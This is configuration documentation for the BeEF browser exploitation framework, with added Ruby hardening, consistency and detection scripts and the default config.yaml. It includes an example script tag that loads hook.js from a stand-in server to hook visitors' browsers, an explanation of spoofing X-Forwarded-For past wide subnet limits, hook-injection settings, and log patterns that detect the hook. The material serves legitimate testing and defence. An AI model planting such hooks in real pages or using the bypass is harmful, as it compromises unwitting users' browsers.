BeEF Configuration

Introduction

BeEF uses YAML files to configure both its core functionality and its extensions. Most of the core BeEF configuration lives in the main configuration file, config.yaml, in the BeEF directory.

To configure an extension, modify the config.yaml file in the folder of the extension you want to change. For more information on command-module configuration files, see: Command Module Configuration.

Authentication

Credentials

Before using BeEF you must change the username and password.

Navigate to the BeEF directory and edit config.yaml with your preferred text editor (Vim, Nano, etc.).

Update the section shown in the following example:

# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
    user:   "beef"
    passwd: "something unique and complex"

Access control

Network restrictions

The web interface used to hook browsers and the web interface used to manage BeEF can both be restricted by subnet. This is done in beef/config.yaml under "Interface / IP restrictions" (the beef.restrictions section).

The permitted_ui_subnet access control should be used to restrict access to the admin interface.

For example:

restrictions:
    permitted_hooking_subnet: ["10.1.0.0/16"]
    permitted_ui_subnet: ["127.0.0.1/32"]

These access restrictions can be bypassed and should not be relied upon on their own.

Ideally, BeEF should run behind a reverse proxy that strips user-supplied proxy headers such as X-Forwarded-For. permitted_ui_subnet should be restricted to 127.0.0.1/32 and the UI accessed over an SSH tunnel. If a reverse proxy is used, the allow_reverse_proxy configuration setting (default false) needs to be changed to true. BeEF will then use the IP address from the X-Forwarded-For proxy header to decide whether a request is allowed to reach the Admin UI. Note: if this setting is true and the UI is accessed directly, or the reverse proxy does not strip user-supplied routing-related HTTP headers (such as X-Forwarded-For), the IP address presented to the admin UI can be spoofed.

While it is not possible to bypass a /32 access control, more permissive ones such as /24 or /16 can be bypassed. In those cases the IP address access control can be bypassed by supplying a valid IP address within the permitted range in the X-Forwarded-For header.

For example, permitted_ui_subnet: ["10.1.1.1/24"] can be bypassed by supplying X-Forwarded-For: 10.1.1.123.

By guessing a valid IP address in the right subnet, an unauthorised user could infer the IP addresses of targets by trying to identify valid addresses within permitted_hooking_subnet during an engagement, or could reach the admin interface when permitted_ui_subnet does not use a /32 range.
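As an added example (not part of the original page or of the BeEF project), the following Ruby script audits the credentials and restrictions sections against the advice above: it flags the default "beef" credentials, permitted_ui_subnet entries wider than a single host, hooking subnets open to the whole Internet, and allow_reverse_proxy being on. The two embedded snippets are constructed from this page's config.yaml; the 16-character password floor is an assumption of this script, not a BeEF setting.

```ruby
require 'yaml'
require 'ipaddr'

# Constructed sample: the shipped defaults from config.yaml (not a live deployment).
DEFAULT_CFG = <<~YAML
  beef:
      credentials:
          user:   "beef"
          passwd: "beef"
      restrictions:
          permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
          permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
          api_attempt_delay: "0.05"
      http:
          allow_reverse_proxy: false
YAML

# Constructed sample: the same sections hardened as recommended above.
HARDENED_CFG = <<~YAML
  beef:
      credentials:
          user:   "operator"
          passwd: "something unique and complex"
      restrictions:
          permitted_hooking_subnet: ["10.1.0.0/16"]
          permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
          api_attempt_delay: "0.05"
      http:
          allow_reverse_proxy: false
YAML

MIN_PASSWD_LENGTH = 16 # assumed floor for this audit, not a BeEF setting

# True when the CIDR names exactly one host (/32 for IPv4, /128 for IPv6).
def single_host?(cidr)
  ip = IPAddr.new(cidr)
  ip.prefix == (ip.ipv6? ? 128 : 32)
end

# Returns a list of findings for the beef section; an empty list means nothing was flagged.
def audit_beef_config(yaml_text)
  cfg = YAML.safe_load(yaml_text).fetch('beef')
  findings = []

  creds = cfg.fetch('credentials', {})
  if creds['user'] == 'beef' || creds['passwd'] == 'beef'
    findings << 'credentials: default "beef" user or password still in use'
  end
  if creds['passwd'].to_s.length < MIN_PASSWD_LENGTH
    findings << "credentials: passwd shorter than #{MIN_PASSWD_LENGTH} characters"
  end

  restr = cfg.fetch('restrictions', {})
  Array(restr['permitted_ui_subnet']).each do |cidr|
    next if single_host?(cidr)
    findings << "permitted_ui_subnet: #{cidr} is wider than one host, so a spoofed X-Forwarded-For can fit inside it"
  end
  Array(restr['permitted_hooking_subnet']).each do |cidr|
    findings << "permitted_hooking_subnet: #{cidr} accepts hooks from anywhere" if IPAddr.new(cidr).prefix.zero?
  end

  if cfg.fetch('http', {})['allow_reverse_proxy']
    findings << 'http.allow_reverse_proxy: true, so the proxy must strip client-supplied X-Forwarded-For'
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  puts audit_beef_config(DEFAULT_CFG)   # prints six findings for the shipped defaults
  puts(audit_beef_config(HARDENED_CFG).empty? ? 'hardened config: no findings' : 'hardened config: findings remain')
end
```

To run it against a real installation, replace the embedded string with File.read('config.yaml'); the checks only look at the keys shown on this page, so extension-level files need their own pass.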

Admin interface

The panel path should also be changed, using the beef.extension.admin_ui.base_path configuration option (that is, the "Extension" > "Admin UI" subsection of beef/config.yaml).

Note that this measure does not prevent attacks against the /api/ REST interface.

Login limits

By default, the admin UI limits login attempts to 1 attempt per second. This can be changed via the beef.extensions.admin_ui.login_fail_delay value in extensions/admin_ui/config.yaml.

By default, the REST API limits login attempts to 1 attempt every 0.05 seconds. This can be changed via the beef.restrictions.api_attempt_delay value in config.yaml.

hook.js

The dynamically generated JavaScript hook file, hook.js, is automatically mounted at /hook.js.

If your BeEF server is 123.123.123.123:3000, the script can be included with an HTML script tag as follows:

<script src="http://123.123.123.123:3000/hook.js"></script>
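From the defender's side, the hook is what ends up in proxy logs and page source. The following Ruby scanner is an added example, not BeEF code: it looks for the default indicators from this page's config.yaml (the hook_file path /hook.js and the BEEFHOOK and BEEFSESSION names) in log lines, HTML, or captured headers. The sample lines and cookie values are constructed. Because an operator can rename the hook file and session names, both are parameters, and a hit is a lead to investigate rather than proof.

```ruby
HOOK_FILE = '/hook.js'
COOKIE_NAMES = %w[BEEFHOOK BEEFSESSION].freeze

# Builds the three detectors for the configured indicator values.
def beef_patterns(hook_file = HOOK_FILE, cookie_names = COOKIE_NAMES)
  hook = Regexp.escape(hook_file)
  names = cookie_names.map { |c| Regexp.escape(c) }.join('|')
  {
    # request line in a web/proxy log whose URL path ends with the hook file
    hook_request: %r{"(?:GET|POST) \S*#{hook}(?:\?\S*)? HTTP/},
    # <script src=...> loading the hook from any host, as in the tag above
    hook_script_tag: %r{<script[^>]+src=["']?[^"'>\s]*#{hook}}i,
    # Cookie/Set-Cookie header or query string carrying a BeEF session name
    beef_cookie: /\b(?:#{names})=/,
  }
end

# Scans text lines and returns [line_number, indicator_name] pairs.
def find_beef_indicators(lines, patterns = beef_patterns)
  hits = []
  lines.each_with_index do |line, idx|
    patterns.each do |name, re|
      hits << [idx + 1, name] if line.match?(re)
    end
  end
  hits
end

# Constructed sample input: two proxy log lines, one HTML line, one header line, one benign line.
SAMPLE_LINES = [
  '10.1.3.7 - - [01/Jan/2020:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
  '10.1.3.7 - - [01/Jan/2020:10:00:01 +0000] "GET http://123.123.123.123:3000/hook.js HTTP/1.1" 200 9000',
  '<script src="http://123.123.123.123:3000/hook.js"></script>',
  'Cookie: BEEFHOOK=constructedvalue1; BEEFSESSION=constructedvalue2',
  '10.1.3.9 - - [01/Jan/2020:10:00:03 +0000] "GET /style.css HTTP/1.1" 200 100',
].freeze

if __FILE__ == $PROGRAM_NAME
  find_beef_indicators(SAMPLE_LINES).each { |n, what| puts "line #{n}: #{what}" }
end
```

Pass a renamed hook path or different session names to beef_patterns when an engagement's config.yaml deviates from the defaults; the line-number output is meant to be joined back to the original log for context such as the client IP and referrer.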

Web server configuration

The web server is fully configurable; this is done in the HTTP subsection of the config.yaml file:

http:
    debug: false # Will print verbose message in BeEF console
    host: "0.0.0.0" # IP address of the web server
    port: "3000" # Port of the web server

    # If BeEF is running behind a reverse proxy or NAT
    #  set the public hostname and port here
    public: "8.7.6.5"
    public_port: "3000"

    dns: "localhost" # Address of DNS server
    hook_file: "/hook.js" # Path for hooking script
    hook_session_name: "BEEFHOOK" # Name of session
    session_cookie_name: "BEEFSESSION" # Name of BeEF cookie

Web server imitation

BeEF also has basic web server imitation. The root page and the HTTP 404 error page can be changed to reflect several popular web servers (Apache, IIS, NGINX) using the beef.http.web_server_imitation directive.

For example:

# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
    enable: true
    type: "apache" # Supported: apache, iis, nginx
    hook_404: false # inject BeEF hook in HTTP 404 responses
    hook_root: false # inject BeEF hook in the server home page

When enabled, the hook_404 and hook_root directives inject the BeEF hook into the HTTP 404 error page and the web root page respectively. This hooks every browser that inspects the web server.

Configuring extensions

Enabling extensions

Extensions should be enabled in the main config.yaml:

extension:
    requester:
        enable: true
    proxy:
        enable: true
    metasploit:
        enable: false
    social_engineering:
        enable: true
    evasion:
        enable: false
    console:
        shell:
            enable: false

When using BeEF, the demos extension should be disabled by setting enable: false in config.yaml.

Metasploit

To enable Metasploit, change the value of beef.extensions.metasploit.enable in beef/config.yaml to true:

extension:
    metasploit:
        enable: true

The Metasploit extension should be configured by modifying its own configuration file, extensions/metasploit/config.yaml, under the beef.extensions.metasploit key (see below):

name: 'Metasploit'
enable: true
host: "127.0.0.1"
port: 55552
user: "msf"
pass: "<password>"
uri: '/api'
ssl: true
ssl_version: 'TLS1'
ssl_verify: true
callback_host: "127.0.0.1"
autopwn_url: "autopwn"

Be sure to change the pass field.
Authenticated access to the Metasploit RPC service can be used to execute arbitrary commands on the underlying operating system.

Apart from the host and callback_host parameters, most of the configuration can be left at its defaults; those two should hold the IP address of the host where Metasploit is reachable.

Use the same host in the next step (it comes before the user and password information).

To enable RPC communication, the following command needs to be run in Metasploit:

load msgrpc ServerHost=127.0.0.1 User=msf Pass=<password> SSL=y

This command can be written to a file and passed to msfconsole with the -r option, although it is usually easier to run it in the Metasploit console. Make sure the settings in the command (host, user, pass, ssl) are the same as those in the configuration file.
The IP address and password must, of course, match the YAML configuration file above.
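The page requires that host, user, pass and ssl agree between extensions/metasploit/config.yaml and the load msgrpc command. The following Ruby check is an added example and is not part of BeEF or Metasploit: it parses both, reports mismatches and an untouched <password> placeholder, and can emit an msfconsole line that matches the YAML (for example for a -r resource file). The YAML is constructed from the values on this page; ServerPort is a msgrpc plugin option that the page's command does not show, and the 16-character password floor is this script's own assumption.

```ruby
require 'yaml'

# Constructed sample of extensions/metasploit/config.yaml with the keys shown on the page.
MSF_EXT_CFG = <<~YAML
  beef:
      extensions:
          metasploit:
              name: 'Metasploit'
              enable: true
              host: "127.0.0.1"
              port: 55552
              user: "msf"
              pass: "<password>"
              uri: '/api'
              ssl: true
              ssl_version: 'TLS1'
              ssl_verify: true
              callback_host: "127.0.0.1"
              autopwn_url: "autopwn"
YAML

MIN_PASS_LENGTH = 16 # assumed floor for this check, not a BeEF or Metasploit setting

# Parses "load msgrpc Key=Value ..." into a hash of its options.
def parse_msgrpc_command(cmd)
  tokens = cmd.strip.split(/\s+/)
  raise ArgumentError, 'not a "load msgrpc" command' unless tokens[0, 2] == %w[load msgrpc]
  tokens.drop(2).map { |kv| kv.split('=', 2) }.select { |pair| pair.size == 2 }.to_h
end

# Compares the BeEF extension config with the msgrpc command and returns a list of findings.
def check_msf_rpc(yaml_text, cmd)
  msf = YAML.safe_load(yaml_text).dig('beef', 'extensions', 'metasploit')
  opts = parse_msgrpc_command(cmd)
  findings = []
  findings << 'pass: placeholder "<password>" still set' if msf['pass'] == '<password>'
  findings << "pass: shorter than #{MIN_PASS_LENGTH} characters" if msf['pass'].to_s.length < MIN_PASS_LENGTH
  findings << "host: BeEF uses #{msf['host']} but msgrpc binds #{opts['ServerHost']}" if msf['host'] != opts['ServerHost']
  findings << "user: BeEF uses #{msf['user']} but msgrpc has #{opts['User']}" if msf['user'] != opts['User']
  findings << 'pass: BeEF and msgrpc passwords differ' if msf['pass'] != opts['Pass']
  cmd_ssl = opts['SSL'].to_s.downcase == 'y'
  findings << "ssl: BeEF ssl=#{msf['ssl']} but msgrpc SSL=#{opts.fetch('SSL', 'n')}" if msf['ssl'] != cmd_ssl
  findings << 'ssl_verify: disabled, so the RPC certificate is not checked' unless msf['ssl_verify']
  if opts['ServerPort'] && msf['port'].to_s != opts['ServerPort']
    findings << "port: BeEF uses #{msf['port']} but msgrpc listens on #{opts['ServerPort']}"
  end
  findings
end

# Emits the msfconsole line that matches the YAML exactly.
def msgrpc_command_for(yaml_text)
  msf = YAML.safe_load(yaml_text).dig('beef', 'extensions', 'metasploit')
  "load msgrpc ServerHost=#{msf['host']} ServerPort=#{msf['port']} " \
    "User=#{msf['user']} Pass=#{msf['pass']} SSL=#{msf['ssl'] ? 'y' : 'n'}"
end

if __FILE__ == $PROGRAM_NAME
  page_cmd = 'load msgrpc ServerHost=127.0.0.1 User=msf Pass=<password> SSL=y'
  puts check_msf_rpc(MSF_EXT_CFG, page_cmd)   # two findings: placeholder password, too short
  puts msgrpc_command_for(MSF_EXT_CFG)
end
```

Running the check before starting BeEF catches the common failure where the YAML was edited but the msfconsole command was not (or vice versa), which otherwise only surfaces as an RPC authentication error at runtime.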

Starting BeEF

You can now start BeEF by running the beef script in the root directory.

The following options are also available:

Usage: beef [options]
    -x, --reset                      Reset the database
    -v, --verbose                    Display debug information
    -a, --ascii_art                  Prints BeEF ascii art
    -c, --config FILE                Load a different configuration file: if it's called custom-config.yaml, git automatically ignores it.
    -p, --port PORT                  Change the default BeEF listening port
    -w, --wsport WS_PORT             Change the default BeEF WebSocket listening port

Contents of config.yaml:

#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file

beef:
    version: '0.5.0.0-alpha-pre'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
    client_debug: false
    # Used for generating secure tokens
    crypto_default_value_length: 80

    # Credentials to authenticate in BeEF.
    # Used by both the RESTful API and the Admin interface
    credentials:
        user:   "beef"
        passwd: "beef"

    # Interface / IP restrictions
    restrictions:
        # subnet of IP addresses that can hook to the framework
        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
        # subnet of IP addresses that can connect to the admin UI
        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
        # slow API calls to 1 every  api_attempt_delay  seconds
        api_attempt_delay: "0.05"

    # HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"

        # Decrease this setting to 1,000 (ms) if you want more responsiveness
        #  when sending modules and retrieving results.
        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
        #  when hooking lots of browsers (50+).
        # Enabling WebSockets is generally better (beef.websocket.enable)
        xhr_poll_timeout: 1000

        # Host Name / Domain Name
        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
        #   set the public hostname below:
        #public: ""      # public hostname/IP address

        # Reverse Proxy / NAT
        # If you want BeEF to be accessible behind a reverse proxy or NAT,
        #   set both the publicly accessible hostname/IP address and port below:
        # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
        #   by altering the X-FORWARDED-FOR ip address in the request header.
        allow_reverse_proxy: false
        #public: ""      # public hostname/IP address
        #public_port: "" # public port (experimental)

        # Hook
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"

        # Allow one or multiple origins to access the RESTful API using CORS
        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"

        # Prefer WebSockets over XHR-polling when possible.
        websocket:
            enable: false
            port: 61985 # WS: good success rate through proxies
            # Use encrypted 'WebSocketSecure'
            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
            secure: true
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel

        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" # Supported: apache, iis, nginx
            hook_404: false # inject BeEF hook in HTTP 404 responses
            hook_root: false # inject BeEF hook in the server home page
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.public (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"

    database:
        file: "beef.db"

    # Autorun Rule Engine
    autorun:
        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
        # continue execution regardless of results.
        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
        result_poll_interval: 300
        result_poll_timeout: 5000

        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
        continue_after_timeout: true

    # Enables DNS lookups on zombie IP addresses
    dns_hostname_lookup: false

    # IP Geolocation
    # NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
    geoip:
        enable: true
        database: '/opt/GeoIP/GeoLite2-City.mmdb'

    # Integration with PhishingFrenzy
    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
    integration:
        phishing_frenzy:
            enable: false

    # You may override default extension configuration parameters here
    # Note: additional experimental extensions are available in the 'extensions' directory
    #       and can be enabled via their respective 'config.yaml' file
    extension:
        admin_ui:
            enable: true
            base_path: "/ui"
        demos:
            enable: true
        events:
            enable: true
        evasion:
            enable: false
        requester:
            enable: true
        proxy:
            enable: true
        network:
            enable: true
        metasploit:
            enable: false
        social_engineering:
            enable: true
        xssrays:
            enable: true

This article was first published on the wangan.com website.
